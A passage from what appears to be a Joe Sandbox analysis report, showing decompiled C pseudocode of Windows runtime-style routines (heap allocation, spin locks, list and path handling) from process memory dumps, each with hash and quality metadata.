              				_t124 = L04BE4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
              				if(_t124 != 0) {
              					 *_t124 =  *_t124 & 0x00000000;
              					_t124[1] = _t124[1] & 0x00000000;
              					_t124[4] = _t124[4] & 0x00000000;
              					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
              						L13:
              						_push(_t124);
              						if((_t106 & 0x00000002) != 0) {
              							_push(0x200);
              							_push(0x28);
              							_push(0xffffffff);
              							_t122 = E04C09800();
              							if(_t122 < 0) {
              								L33:
              								if((_t124[4] & 0x00000001) != 0) {
              									_push(4);
              									_t64 =  &(_t124[1]); // 0x4
              									_t107 = _t64;
              									_push(_t107);
              									_push(5);
              									_push(0xfffffffe);
              									E04C095B0();
              									if( *_t107 != 0) {
              										_push( *_t107);
              										E04C095D0();
              									}
              								}
              								_push(_t124);
              								_push(0);
              								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
              								L37:
              								L04BE77F0();
              								return _t122;
              							}
              							_t124[4] = _t124[4] | 0x00000002;
              							L18:
              							_t108 = _a8;
              							_t29 =  &(_t124[0x105]); // 0x414
              							_t80 = _t29;
              							_t30 =  &(_t124[5]); // 0x14
              							_t124[3] = _t80;
              							_t123 = 0;
              							_t124[2] = _t30;
              							 *_t80 = _t108;
              							if(_t108 == 0) {
              								L21:
              								_t112 = 0x400;
              								_push( &_v8);
              								_v8 = 0x400;
              								_push(_t124[2]);
              								_push(0x400);
              								_push(_t124[3]);
              								_push(0);
              								_push( *_t124);
              								_t122 = E04C09910();
              								if(_t122 != 0xc0000023) {
              									L26:
              									if(_t122 != 0x106) {
              										L40:
              										if(_t122 < 0) {
              											L29:
              											_t83 = _t124[2];
              											if(_t83 != 0) {
              												_t59 =  &(_t124[5]); // 0x14
              												if(_t83 != _t59) {
              													L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
              												}
              											}
              											_push( *_t124);
              											E04C095D0();
              											goto L33;
              										}
              										 *_a16 = _t124;
              										return 0;
              									}
              									if(_t108 != 1) {
              										_t122 = 0;
              										goto L40;
              									}
              									_t122 = 0xc0000061;
              									goto L29;
              								} else {
              									goto L22;
              								}
              								while(1) {
              									L22:
              									_t89 =  *0x4cb7b9c; // 0x0
              									_t92 = L04BE4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
              									_t124[2] = _t92;
              									if(_t92 == 0) {
              										break;
              									}
              									_t112 =  &_v8;
              									_push( &_v8);
              									_push(_t92);
              									_push(_v8);
              									_push(_t124[3]);
              									_push(0);
              									_push( *_t124);
              									_t122 = E04C09910();
              									if(_t122 != 0xc0000023) {
              										goto L26;
              									}
              									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
              								}
              								_t122 = 0xc0000017;
              								goto L26;
              							}
              							_t119 = 0;
              							do {
              								_t114 = _t124[3];
              								_t119 = _t119 + 0xc;
              								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
              								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
              								_t123 = _t123 + 1;
              								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
              							} while (_t123 < _t108);
              							goto L21;
              						}
              						_push(0x28);
              						_push(3);
              						_t122 = E04BCA7B0();
              						if(_t122 < 0) {
              							goto L33;
              						}
              						_t124[4] = _t124[4] | 0x00000001;
              						goto L18;
              					}
              					if((_t106 & 0x00000001) == 0) {
              						_t115 = 0x28;
              						_t122 = E04C5E7D3(_t115, _t124);
              						if(_t122 < 0) {
              							L9:
              							_push(_t124);
              							_push(0);
              							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
              							goto L37;
              						}
              						L12:
              						if( *_t124 != 0) {
              							goto L18;
              						}
              						goto L13;
              					}
              					_t15 =  &(_t124[1]); // 0x4
              					_t117 = 4;
              					_t122 = E04C5E7D3(_t117, _t15);
              					if(_t122 >= 0) {
              						_t124[4] = _t124[4] | 0x00000001;
              						_v12 = _v12 & 0x00000000;
              						_push(4);
              						_push( &_v12);
              						_push(5);
              						_push(0xfffffffe);
              						E04C095B0();
              						goto L12;
              					}
              					goto L9;
              				} else {
              					return 0xc0000017;
              				}
              			}


              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5f2949149a3b0bc47bf71c3594e5bcc7ada166420f53b6356afed7ac2723b1ae
              • Instruction ID: b6a6dedc4175aee14438f522b54db92039b69ff93aa13c495c11493bc026442d
              • Opcode Fuzzy Hash: 5f2949149a3b0bc47bf71c3594e5bcc7ada166420f53b6356afed7ac2723b1ae
              • Instruction Fuzzy Hash: 5071F032200705AFE7318F15C845F6ABBB6EB44724F144528EA558B2F1EB75FE80DB54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E04BC52A5(char __ecx) {
              				char _v20;
              				char _v28;
              				char _v29;
              				void* _v32;
              				void* _v36;
              				void* _v37;
              				void* _v38;
              				void* _v40;
              				void* _v46;
              				void* _v64;
              				void* __ebx;
              				intOrPtr* _t49;
              				signed int _t53;
              				short _t85;
              				signed int _t87;
              				signed int _t88;
              				signed int _t89;
              				intOrPtr _t101;
              				intOrPtr* _t102;
              				intOrPtr* _t104;
              				signed int _t106;
              				void* _t108;
              
              				_t93 = __ecx;
              				_t108 = (_t106 & 0xfffffff8) - 0x1c;
              				_push(_t88);
              				_v29 = __ecx;
              				_t89 = _t88 | 0xffffffff;
              				while(1) {
              					E04BDEEF0(0x4cb79a0);
              					_t104 =  *0x4cb8210; // 0x3102bb0
              					if(_t104 == 0) {
              						break;
              					}
              					asm("lock inc dword [esi]");
              					_t2 = _t104 + 8; // 0x28000000
              					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
              					E04BDEB70(_t93, 0x4cb79a0);
              					if( *((char*)(_t108 + 0xf)) != 0) {
              						_t101 =  *0x7ffe02dc;
              						__eflags =  *(_t104 + 0x14) & 0x00000001;
              						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
              							L9:
              							_push(0);
              							_push(0);
              							_push(0);
              							_push(0);
              							_push(0x90028);
              							_push(_t108 + 0x20);
              							_push(0);
              							_push(0);
              							_push(0);
              							_t10 = _t104 + 4; // 0x0
              							_push( *_t10);
              							_t53 = E04C09890();
              							__eflags = _t53;
              							if(_t53 >= 0) {
              								__eflags =  *(_t104 + 0x14) & 0x00000001;
              								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
              									E04BDEEF0(0x4cb79a0);
              									 *((intOrPtr*)(_t104 + 8)) = _t101;
              									E04BDEB70(0, 0x4cb79a0);
              								}
              								goto L3;
              							}
              							__eflags = _t53 - 0xc0000012;
              							if(__eflags == 0) {
              								L12:
              								_t11 = _t104 + 0xe; // 0x102bc802
              								_t13 = _t104 + 0xc; // 0x3102bbd
              								_t93 = _t13;
              								 *((char*)(_t108 + 0x12)) = 0;
              								__eflags = E04BFF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
              								if(__eflags >= 0) {
              									L15:
              									_t102 = _v28;
              									 *_t102 = 2;
              									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
              									E04BDEEF0(0x4cb79a0);
              									__eflags =  *0x4cb8210 - _t104; // 0x3102bb0
              									if(__eflags == 0) {
              										__eflags =  *((char*)(_t108 + 0xe));
              										_t95 =  *((intOrPtr*)(_t108 + 0x14));
              										 *0x4cb8210 = _t102;
              										_t32 = _t102 + 0xc; // 0x0
              										 *_t95 =  *_t32;
              										_t33 = _t102 + 0x10; // 0x0
              										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
              										_t35 = _t102 + 4; // 0xffffffff
              										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
              										if(__eflags != 0) {
              											_t37 = _t104 + 0x10; // 0x2003102b
              											_t95 =  *((intOrPtr*)( *_t37));
              											E04C44888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
              										}
              										E04BDEB70(_t95, 0x4cb79a0);
              										asm("lock xadd [esi], eax");
              										if(__eflags == 0) {
              											_t38 = _t104 + 4; // 0x0
              											_push( *_t38);
              											E04C095D0();
              											L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
              										}
              										asm("lock xadd [esi], ebx");
              										__eflags = _t89 == 1;
              										if(_t89 == 1) {
              											_t41 = _t104 + 4; // 0x0
              											_push( *_t41);
              											E04C095D0();
              											L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
              										}
              										_t49 = _t102;
              										L4:
              										return _t49;
              									}
              									E04BDEB70(_t93, 0x4cb79a0);
              									asm("lock xadd [esi], eax");
              									if(__eflags == 0) {
              										_t25 = _t104 + 4; // 0x0
              										_push( *_t25);
              										E04C095D0();
              										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
              										_t102 =  *((intOrPtr*)(_t108 + 0x10));
              									}
              									 *_t102 = 1;
              									asm("lock xadd [edi], eax");
              									if(__eflags == 0) {
              										_t28 = _t102 + 4; // 0xffffffff
              										_push( *_t28);
              										E04C095D0();
              										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
              									}
              									continue;
              								}
              								_t15 = _t104 + 0x10; // 0x2003102b
              								_t93 =  &_v20;
              								_t17 = _t104 + 0xe; // 0x102bc802
              								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
              								_t85 = 6;
              								_v20 = _t85;
              								_t87 = E04BFF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
              								__eflags = _t87;
              								if(_t87 < 0) {
              									goto L3;
              								}
              								 *((char*)(_t108 + 0xe)) = 1;
              								goto L15;
              							}
              							__eflags = _t53 - 0xc000026e;
              							if(__eflags != 0) {
              								goto L3;
              							}
              							goto L12;
              						}
              						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
              						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
              							goto L3;
              						} else {
              							goto L9;
              						}
              					}
              					L3:
              					_t49 = _t104;
              					goto L4;
              				}
              				_t49 = 0;
              				goto L4;
              			}

              0x04c20ea3
              0x04c20ea3
              0x04c20ea7
              0x04c20eaf
              0x04c20eb3
              0x04c20eb9
              0x04c20eb9
              0x04c20ebc
              0x04c20ecd
              0x04c20ecd
              0x00000000
              0x04c20eb3
              0x04c20e1e
              0x04c20e21
              0x04c20e25
              0x04c20e2b
              0x04c20e2f
              0x04c20e30
              0x04c20e3a
              0x04c20e3f
              0x04c20e41
              0x00000000
              0x00000000
              0x04c20e47
              0x00000000
              0x04c20e47
              0x04c20df9
              0x04c20dfe
              0x00000000
              0x00000000
              0x00000000
              0x04c20dfe
              0x04bc5303
              0x04bc5307
              0x00000000
              0x04bc5309
              0x00000000
              0x04bc5309
              0x04bc5307
              0x04bc52e9
              0x04bc52e9
              0x00000000
              0x04bc52e9
              0x04bc530e
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 55423b027b42154ae40e285013e32fa5aac4663480b47693450133e97f2649f6
              • Instruction ID: 7eee85a33d21a3e5e9ad41d3a9fe7acf6e1a2f17a3f143e17ccd0d337aa588b1
              • Opcode Fuzzy Hash: 55423b027b42154ae40e285013e32fa5aac4663480b47693450133e97f2649f6
              • Instruction Fuzzy Hash: FB510F70206751AFEB20EF25C981B27BBE6FF80714F10495EE5958B690E7B0F840CB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E04BDEF40(intOrPtr __ecx) {
              				char _v5;
              				char _v6;
              				char _v7;
              				char _v8;
              				signed int _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				intOrPtr _t58;
              				char _t59;
              				signed char _t69;
              				void* _t73;
              				signed int _t74;
              				char _t79;
              				signed char _t81;
              				signed int _t85;
              				signed int _t87;
              				intOrPtr _t90;
              				signed char* _t91;
              				void* _t92;
              				signed int _t94;
              				void* _t96;
              
              				_t90 = __ecx;
              				_v16 = __ecx;
              				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
              					_t58 =  *((intOrPtr*)(__ecx));
              					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
              						E04BC9080(_t73, __ecx, __ecx, _t92);
              					}
              				}
              				_t74 = 0;
              				_t96 =  *0x7ffe036a - 1;
              				_v12 = 0;
              				_v7 = 0;
              				if(_t96 > 0) {
              					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
              					_v12 = _t74;
              					_v7 = _t96 != 0;
              				}
              				_t79 = 0;
              				_v8 = 0;
              				_v5 = 0;
              				while(1) {
              					L4:
              					_t59 = 1;
              					L5:
              					while(1) {
              						if(_t59 == 0) {
              							L12:
              							_t21 = _t90 + 4; // 0x7738c21e
              							_t87 =  *_t21;
              							_v6 = 0;
              							if(_t79 != 0) {
              								if((_t87 & 0x00000002) != 0) {
              									goto L19;
              								}
              								if((_t87 & 0x00000001) != 0) {
              									_v6 = 1;
              									_t74 = _t87 ^ 0x00000003;
              								} else {
              									_t51 = _t87 - 2; // -2
              									_t74 = _t51;
              								}
              								goto L15;
              							} else {
              								if((_t87 & 0x00000001) != 0) {
              									_v6 = 1;
              									_t74 = _t87 ^ 0x00000001;
              								} else {
              									_t26 = _t87 - 4; // -4
              									_t74 = _t26;
              									if((_t74 & 0x00000002) == 0) {
              										_t74 = _t74 - 2;
              									}
              								}
              								L15:
              								if(_t74 == _t87) {
              									L19:
              									E04BC2D8A(_t74, _t90, _t87, _t90);
              									_t74 = _v12;
              									_v8 = 1;
              									if(_v7 != 0 && _t74 > 0x64) {
              										_t74 = _t74 - 1;
              										_v12 = _t74;
              									}
              									_t79 = _v5;
              									goto L4;
              								}
              								asm("lock cmpxchg [esi], ecx");
              								if(_t87 != _t87) {
              									_t74 = _v12;
              									_t59 = 0;
              									_t79 = _v5;
              									continue;
              								}
              								if(_v6 != 0) {
              									_t74 = _v12;
              									L25:
              									if(_v7 != 0) {
              										if(_t74 < 0x7d0) {
              											if(_v8 == 0) {
              												_t74 = _t74 + 1;
              											}
              										}
              										_t38 = _t90 + 0x14; // 0x0
              										_t39 = _t90 + 0x14; // 0x0
              										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
              										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
              											_t85 = _t85 & 0xff000000;
              										}
              										 *(_t90 + 0x14) = _t85;
              									}
              									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
              									 *((intOrPtr*)(_t90 + 8)) = 1;
              									return 0;
              								}
              								_v5 = 1;
              								_t87 = _t74;
              								goto L19;
              							}
              						}
              						_t94 = _t74;
              						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
              						if(_t74 == 0) {
              							goto L12;
              						} else {
              							_t91 = _t90 + 4;
              							goto L8;
              							L9:
              							while((_t81 & 0x00000001) != 0) {
              								_t69 = _t81;
              								asm("lock cmpxchg [edi], edx");
              								if(_t69 != _t81) {
              									_t81 = _t69;
              									continue;
              								}
              								_t90 = _v16;
              								goto L25;
              							}
              							asm("pause");
              							_t94 = _t94 - 1;
              							if(_t94 != 0) {
              								L8:
              								_t81 =  *_t91;
              								goto L9;
              							} else {
              								_t90 = _v16;
              								_t79 = _v5;
              								goto L12;
              							}
              						}
              					}
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
              • Instruction ID: 31fbbf3c63c6555d29c48bb02be9856b335504a4f463406dc5e94b00268e43ec
              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
              • Instruction Fuzzy Hash: 7151C230A08645DFEB18CF68C1D07AEBBB1EF05314F1881E8D5565B281F375B989D751
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 84%
              			E04C9740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
              				signed short* _v8;
              				intOrPtr _v12;
              				intOrPtr _t55;
              				void* _t56;
              				intOrPtr* _t66;
              				intOrPtr* _t69;
              				void* _t74;
              				intOrPtr* _t78;
              				intOrPtr* _t81;
              				intOrPtr* _t82;
              				intOrPtr _t83;
              				signed short* _t84;
              				intOrPtr _t85;
              				signed int _t87;
              				intOrPtr* _t90;
              				intOrPtr* _t93;
              				intOrPtr* _t94;
              				void* _t98;
              
              				_t84 = __edx;
              				_t80 = __ecx;
              				_push(__ecx);
              				_push(__ecx);
              				_t55 = __ecx;
              				_v8 = __edx;
              				_t87 =  *__edx & 0x0000ffff;
              				_v12 = __ecx;
              				_t3 = _t55 + 0x154; // 0x154
              				_t93 = _t3;
              				_t78 =  *_t93;
              				_t4 = _t87 + 2; // 0x2
              				_t56 = _t4;
              				while(_t78 != _t93) {
              					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
              						L4:
              						_t78 =  *_t78;
              						continue;
              					} else {
              						_t7 = _t78 + 0x18; // 0x18
              						if(E04C1D4F0(_t7, _t84[2], _t87) == _t87) {
              							_t40 = _t78 + 0xc; // 0xc
              							_t94 = _t40;
              							_t90 =  *_t94;
              							while(_t90 != _t94) {
              								_t41 = _t90 + 8; // 0x8
              								_t74 = E04C0F380(_a4, _t41, 0x10);
              								_t98 = _t98 + 0xc;
              								if(_t74 != 0) {
              									_t90 =  *_t90;
              									continue;
              								}
              								goto L12;
              							}
              							_t82 = L04BE4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
              							if(_t82 != 0) {
              								_t46 = _t78 + 0xc; // 0xc
              								_t69 = _t46;
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								_t85 =  *_t69;
              								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
              									L20:
              									_t82 = 3;
              									asm("int 0x29");
              								}
              								 *((intOrPtr*)(_t82 + 4)) = _t69;
              								 *_t82 = _t85;
              								 *((intOrPtr*)(_t85 + 4)) = _t82;
              								 *_t69 = _t82;
              								 *(_t78 + 8) =  *(_t78 + 8) + 1;
              								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
              								goto L11;
              							} else {
              								L18:
              								_push(0xe);
              								_pop(0);
              							}
              						} else {
              							_t84 = _v8;
              							_t9 = _t87 + 2; // 0x2
              							_t56 = _t9;
              							goto L4;
              						}
              					}
              					L12:
              					return 0;
              				}
              				_t10 = _t87 + 0x1a; // 0x1a
              				_t78 = L04BE4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
              				if(_t78 == 0) {
              					goto L18;
              				} else {
              					_t12 = _t87 + 2; // 0x2
              					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
              					_t16 = _t78 + 0x18; // 0x18
              					E04C0F3E0(_t16, _v8[2], _t87);
              					 *((short*)(_t78 + _t87 + 0x18)) = 0;
              					_t19 = _t78 + 0xc; // 0xc
              					_t66 = _t19;
              					 *((intOrPtr*)(_t66 + 4)) = _t66;
              					 *_t66 = _t66;
              					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
              					_t81 = L04BE4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
              					if(_t81 == 0) {
              						goto L18;
              					} else {
              						_t26 = _t78 + 0xc; // 0xc
              						_t69 = _t26;
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						_t85 =  *_t69;
              						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
              							goto L20;
              						} else {
              							 *((intOrPtr*)(_t81 + 4)) = _t69;
              							 *_t81 = _t85;
              							 *((intOrPtr*)(_t85 + 4)) = _t81;
              							 *_t69 = _t81;
              							_t83 = _v12;
              							 *(_t78 + 8) = 1;
              							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
              							_t34 = _t83 + 0x154; // 0x1ba
              							_t69 = _t34;
              							_t85 =  *_t69;
              							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
              								goto L20;
              							} else {
              								 *_t78 = _t85;
              								 *((intOrPtr*)(_t78 + 4)) = _t69;
              								 *((intOrPtr*)(_t85 + 4)) = _t78;
              								 *_t69 = _t78;
              								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
              							}
              						}
              						goto L11;
              					}
              				}
              				goto L12;
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
              • Instruction ID: 470f4ad4b0fbe141d254a1a332b3ae73d7514693fae2d1788005e7f303909157
              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
              • Instruction Fuzzy Hash: 6C517B71602606EFDF55CF54C484A56BBF6FF45304F18C0AAE9089F252E371EA46CB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E04BF4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				signed int _v12;
              				char _v176;
              				char _v177;
              				char _v184;
              				intOrPtr _v192;
              				intOrPtr _v196;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed short _t42;
              				char* _t44;
              				intOrPtr _t46;
              				intOrPtr _t50;
              				char* _t57;
              				intOrPtr _t59;
              				intOrPtr _t67;
              				signed int _t69;
              
              				_t64 = __edx;
              				_v12 =  *0x4cbd360 ^ _t69;
              				_t65 = 0xa0;
              				_v196 = __edx;
              				_v177 = 0;
              				_t67 = __ecx;
              				_v192 = __ecx;
              				E04C0FA60( &_v176, 0, 0xa0);
              				_t57 =  &_v176;
              				_t59 = 0xa0;
              				if( *0x4cb7bc8 != 0) {
              					L3:
              					while(1) {
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						_t67 = _v192;
              						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
              						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
              						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
              						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
              						_push( &_v184);
              						_push(_t59);
              						_push(_t57);
              						_push(0xa0);
              						_push(_t57);
              						_push(0xf);
              						_t42 = E04C0B0B0();
              						if(_t42 != 0xc0000023) {
              							break;
              						}
              						if(_v177 != 0) {
              							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
              						}
              						_v177 = 1;
              						_t44 = L04BE4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
              						_t59 = _v184;
              						_t57 = _t44;
              						if(_t57 != 0) {
              							continue;
              						} else {
              							_t42 = 0xc0000017;
              							break;
              						}
              					}
              					if(_t42 != 0) {
              						_t65 = E04BCCCC0(_t42);
              						if(_t65 != 0) {
              							L10:
              							if(_v177 != 0) {
              								if(_t57 != 0) {
              									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
              								}
              							}
              							_t46 = _t65;
              							L12:
              							return E04C0B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
              						}
              						L7:
              						_t50 = _a4;
              						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
              						if(_t50 != 3) {
              							if(_t50 == 2) {
              								goto L8;
              							}
              							L9:
              							if(E04C0F380(_t67 + 0xc, 0x4ba5138, 0x10) == 0) {
              								 *0x4cb60d8 = _t67;
              							}
              							goto L10;
              						}
              						L8:
              						_t64 = _t57 + 0x28;
              						E04BF4F49(_t67, _t57 + 0x28);
              						goto L9;
              					}
              					_t65 = 0;
              					goto L7;
              				}
              				if(E04BF4E70(0x4cb86b0, 0x4bf5690, 0, 0) != 0) {
              					_t46 = E04BCCCC0(_t56);
              					goto L12;
              				} else {
              					_t59 = 0xa0;
              					goto L3;
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 012b529f92b19d84292d6fbe3ed59babcfebd5321fa8c78a7928bd2f04357934
              • Instruction ID: d5eac3f83b856f71d202b71bab66ab9db00d7cae66c9135a823b99b459b46e25
              • Opcode Fuzzy Hash: 012b529f92b19d84292d6fbe3ed59babcfebd5321fa8c78a7928bd2f04357934
              • Instruction Fuzzy Hash: 1641E175B00318AFEB35DF14CD80BABB7AAEB54614F0044E9EA4997280E774FD488A91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E04C03D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
              				intOrPtr _v8;
              				char _v12;
              				signed short** _t33;
              				short* _t38;
              				intOrPtr* _t39;
              				intOrPtr* _t41;
              				signed short _t43;
              				intOrPtr* _t47;
              				intOrPtr* _t53;
              				signed short _t57;
              				intOrPtr _t58;
              				signed short _t60;
              				signed short* _t61;
              
              				_t47 = __ecx;
              				_t61 = __edx;
              				_t60 = ( *__ecx & 0x0000ffff) + 2;
              				if(_t60 > 0xfffe) {
              					L22:
              					return 0xc0000106;
              				}
              				if(__edx != 0) {
              					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
              						L5:
              						E04BD7B60(0, _t61, 0x4ba11c4);
              						_v12 =  *_t47;
              						_v12 = _v12 + 0xfff8;
              						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
              						E04BD7B60(0xfff8, _t61,  &_v12);
              						_t33 = _a8;
              						if(_t33 != 0) {
              							 *_t33 = _t61;
              						}
              						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
              						_t53 = _a12;
              						if(_t53 != 0) {
              							_t57 = _t61[2];
              							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
              							while(_t38 >= _t57) {
              								if( *_t38 == 0x5c) {
              									_t41 = _t38 + 2;
              									if(_t41 == 0) {
              										break;
              									}
              									_t58 = 0;
              									if( *_t41 == 0) {
              										L19:
              										 *_t53 = _t58;
              										goto L7;
              									}
              									 *_t53 = _t41;
              									goto L7;
              								}
              								_t38 = _t38 - 2;
              							}
              							_t58 = 0;
              							goto L19;
              						} else {
              							L7:
              							_t39 = _a16;
              							if(_t39 != 0) {
              								 *_t39 = 0;
              								 *((intOrPtr*)(_t39 + 4)) = 0;
              								 *((intOrPtr*)(_t39 + 8)) = 0;
              								 *((intOrPtr*)(_t39 + 0xc)) = 0;
              							}
              							return 0;
              						}
              					}
              					_t61 = _a4;
              					if(_t61 != 0) {
              						L3:
              						_t43 = L04BE4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
              						_t61[2] = _t43;
              						if(_t43 == 0) {
              							return 0xc0000017;
              						}
              						_t61[1] = _t60;
              						 *_t61 = 0;
              						goto L5;
              					}
              					goto L22;
              				}
              				_t61 = _a4;
              				if(_t61 == 0) {
              					return 0xc000000d;
              				}
              				goto L3;
              			}

              Memory Dump Source
